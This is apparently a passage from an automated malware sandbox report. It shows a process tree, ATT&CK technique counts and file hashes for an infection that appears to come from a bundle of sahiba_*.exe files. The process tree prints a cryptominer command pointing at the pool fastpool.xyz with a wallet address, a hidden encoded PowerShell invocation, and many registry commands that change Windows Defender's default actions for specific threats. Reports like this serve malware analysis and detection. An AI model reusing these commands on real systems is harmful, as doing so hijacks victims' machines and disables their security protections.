                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 4956 -ip 4956
                                                                                            1⤵
                                                                                              PID:2848
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4084 -ip 4084
                                                                                              1⤵
                                                                                                PID:4200
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4816 -ip 4816
                                                                                                1⤵
                                                                                                  PID:4420
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4816 -ip 4816
                                                                                                  1⤵
                                                                                                    PID:4400
                                                                                                  • C:\Windows\SysWOW64\ztsineby\mekltlmb.exe
                                                                                                    C:\Windows\SysWOW64\ztsineby\mekltlmb.exe /d"C:\Users\Admin\Documents\Bt0d6JO5X6h63uHM0Ymbqbb_.exe"
                                                                                                    1⤵
                                                                                                      PID:540
                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                        svchost.exe
                                                                                                        2⤵
                                                                                                          PID:4608
                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                            svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                            3⤵
                                                                                                              PID:6104
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 540
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5240
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4952 -ip 4952
                                                                                                          1⤵
                                                                                                          • Checks processor information in registry
                                                                                                          • Enumerates system info in registry
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:4120
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4816 -ip 4816
                                                                                                          1⤵
                                                                                                            PID:668
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2424 -ip 2424
                                                                                                            1⤵
                                                                                                              PID:5228
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 540 -ip 540
                                                                                                              1⤵
                                                                                                                PID:5180
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4816 -ip 4816
                                                                                                                1⤵
                                                                                                                  PID:5656
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                  1⤵
                                                                                                                    PID:5696
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4816 -ip 4816
                                                                                                                    1⤵
                                                                                                                      PID:5844
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4816 -ip 4816
                                                                                                                      1⤵
                                                                                                                        PID:5916
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4816 -ip 4816
                                                                                                                        1⤵
                                                                                                                          PID:5200
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4816 -ip 4816
                                                                                                                          1⤵
                                                                                                                            PID:1324
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4816 -ip 4816
                                                                                                                            1⤵
                                                                                                                              PID:1788
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\XbRavey.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\XbRavey.exe j1 /site_id 525403 /S
                                                                                                                              1⤵
                                                                                                                                PID:444
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                  2⤵
                                                                                                                                    PID:4636
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:4852
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                          4⤵
                                                                                                                                            PID:3664
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:5616
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:5868
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:4352
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:4064
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4152
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3476
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5884
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:732
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4952
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4908

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                        Execution

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Persistence

                                                                                                                                                        Modify Existing Service

                                                                                                                                                        2
                                                                                                                                                        T1031

                                                                                                                                                        New Service

                                                                                                                                                        1
                                                                                                                                                        T1050

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        1
                                                                                                                                                        T1060

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Privilege Escalation

                                                                                                                                                        New Service

                                                                                                                                                        1
                                                                                                                                                        T1050

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Defense Evasion

                                                                                                                                                        Modify Registry

                                                                                                                                                        3
                                                                                                                                                        T1112

                                                                                                                                                        Disabling Security Tools

                                                                                                                                                        1
                                                                                                                                                        T1089

                                                                                                                                                        Install Root Certificate

                                                                                                                                                        1
                                                                                                                                                        T1130

                                                                                                                                                        Credential Access

                                                                                                                                                        Credentials in Files

                                                                                                                                                        1
                                                                                                                                                        T1081

                                                                                                                                                        Discovery

                                                                                                                                                        Query Registry

                                                                                                                                                        4
                                                                                                                                                        T1012

                                                                                                                                                        System Information Discovery

                                                                                                                                                        5
                                                                                                                                                        T1082

                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                        1
                                                                                                                                                        T1120

                                                                                                                                                        Process Discovery

                                                                                                                                                        1
                                                                                                                                                        T1057

                                                                                                                                                        Collection

                                                                                                                                                        Data from Local System

                                                                                                                                                        1
                                                                                                                                                        T1005

                                                                                                                                                        Command and Control

                                                                                                                                                        Web Service

                                                                                                                                                        1
                                                                                                                                                        T1102

                                                                                                                                                        Replay Monitor

                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                          MD5

                                                                                                                                                          71b3d3aff7419f41f7079d6a98dd4b71

                                                                                                                                                          SHA1

                                                                                                                                                          46c5002b862f917a6ff36057a8393b5508c05ac0

                                                                                                                                                          SHA256

                                                                                                                                                          696d67be311db74819d6d248c45c2c679bd0cfa8386cc108a108eadfe822d3f5

                                                                                                                                                          SHA512

                                                                                                                                                          da5264913642a39532f9148b2c25c9dae6219ad5bef854081b69a2d049aa1426060dc1f6ac4834317d6e8f61f87e5330656ae4870f53215177e563ee39d2e62f

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                          MD5

                                                                                                                                                          3c70c46b9af8e86608a0f07f739ad1fb

                                                                                                                                                          SHA1

                                                                                                                                                          6cccb3e7efa6d30cd5bdb65df467e5fb7eafd10b

                                                                                                                                                          SHA256

                                                                                                                                                          78ad0aeab10e564b9f845a3483a2065b65753b300649081851d3e2d7e610d897

                                                                                                                                                          SHA512

                                                                                                                                                          59a950c6bb2271b2b8bcd0d9e736ce6af4074a097b1658f9cd5c816dc60c6624cf61a37bc18a9f05bf33842300010b535959b1a93315dfe7566ccacfaf59f34a

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                          MD5

                                                                                                                                                          3d1fc4e814c596c36a62f39e92a43754

                                                                                                                                                          SHA1

                                                                                                                                                          550658320224ee2fb2e3769c8721f9a80bf7a725

                                                                                                                                                          SHA256

                                                                                                                                                          7db0d655e71371f20100a812b300822d2af35d6a41e5fec09908242baca5541d

                                                                                                                                                          SHA512

                                                                                                                                                          7730d8502dbdd29b74e048cb4d27b2cfc5b04e74c8b7313a59be9807bb16c988c2ac299a9b1b86a4c174b341cd10efdfe4ff68dd9291f13f3ca36f0266e821cf

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                          MD5

                                                                                                                                                          6a04dedd9a508e83b84e34ac0fa8648f

                                                                                                                                                          SHA1

                                                                                                                                                          bc1e8e44c55b9b10ee04e11540ecfb4e33f35f79

                                                                                                                                                          SHA256

                                                                                                                                                          56d4836c8e590523e76f9155bf83a153a5bdb60079706ab16d51505703979ddf

                                                                                                                                                          SHA512

                                                                                                                                                          1757831f2a3c19f8acd6a30c3cc057cbf42fb3a54a8999bd834fa4027835674d29651b54d13a08406f81d1d261240abb8bae72064c3ebb078311b00fb529e6ad

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libcurl.dll
                                                                                                                                                          MD5

                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                          SHA1

                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                          SHA256

                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                          SHA512

                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libcurl.dll
                                                                                                                                                          MD5

                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                          SHA1

                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                          SHA256

                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                          SHA512

                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libcurl.dll
                                                                                                                                                          MD5

                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                          SHA1

                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                          SHA256

                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                          SHA512

                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libcurlpp.dll
                                                                                                                                                          MD5

                                                                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                          SHA1

                                                                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                          SHA256

                                                                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                          SHA512

                                                                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libcurlpp.dll
                                                                                                                                                          MD5

                                                                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                          SHA1

                                                                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                          SHA256

                                                                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                          SHA512

                                                                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libgcc_s_dw2-1.dll
                                                                                                                                                          MD5

                                                                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                          SHA1

                                                                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                          SHA256

                                                                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                          SHA512

                                                                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libgcc_s_dw2-1.dll
                                                                                                                                                          MD5

                                                                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                          SHA1

                                                                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                          SHA256

                                                                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                          SHA512

                                                                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libstdc++-6.dll
                                                                                                                                                          MD5

                                                                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                          SHA1

                                                                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                          SHA256

                                                                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                          SHA512

                                                                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libstdc++-6.dll
                                                                                                                                                          MD5

                                                                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                          SHA1

                                                                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                          SHA256

                                                                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                          SHA512

                                                                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libwinpthread-1.dll
                                                                                                                                                          MD5

                                                                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                          SHA1

                                                                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                          SHA256

                                                                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                          SHA512

                                                                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\libwinpthread-1.dll
                                                                                                                                                          MD5

                                                                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                          SHA1

                                                                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                          SHA256

                                                                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                          SHA512

                                                                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_1.exe
                                                                                                                                                          MD5

                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                          SHA1

                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                          SHA256

                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                          SHA512

                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_1.exe
                                                                                                                                                          MD5

                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                          SHA1

                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                          SHA256

                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                          SHA512

                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_1.txt
                                                                                                                                                          MD5

                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                          SHA1

                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                          SHA256

                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                          SHA512

                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_2.exe
                                                                                                                                                          MD5

                                                                                                                                                          e795569cb2a9a7bd70c8dc768d4044e3

                                                                                                                                                          SHA1

                                                                                                                                                          5e8ad632c24c7f6521cf7a2b3fa71ccd984f4f5f

                                                                                                                                                          SHA256

                                                                                                                                                          358375713104521485193523a2e8fe85669f7c2ba9f2dd7c421e3b3fd3588993

                                                                                                                                                          SHA512

                                                                                                                                                          f66b897ebf0d3a23adb63dbd529d0483e6ad928568977752921faa2f27a1ef9da7efdc39801575aef13154ae8c00dd13aa44017c6e2bd768c8b69387df4a85d4

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_2.txt
                                                                                                                                                          MD5

                                                                                                                                                          e795569cb2a9a7bd70c8dc768d4044e3

                                                                                                                                                          SHA1

                                                                                                                                                          5e8ad632c24c7f6521cf7a2b3fa71ccd984f4f5f

                                                                                                                                                          SHA256

                                                                                                                                                          358375713104521485193523a2e8fe85669f7c2ba9f2dd7c421e3b3fd3588993

                                                                                                                                                          SHA512

                                                                                                                                                          f66b897ebf0d3a23adb63dbd529d0483e6ad928568977752921faa2f27a1ef9da7efdc39801575aef13154ae8c00dd13aa44017c6e2bd768c8b69387df4a85d4

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_3.exe
                                                                                                                                                          MD5

                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                          SHA1

                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                          SHA256

                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                          SHA512

                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_3.txt
                                                                                                                                                          MD5

                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                          SHA1

                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                          SHA256

                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                          SHA512

                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_4.exe
                                                                                                                                                          MD5

                                                                                                                                                          6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                          SHA1

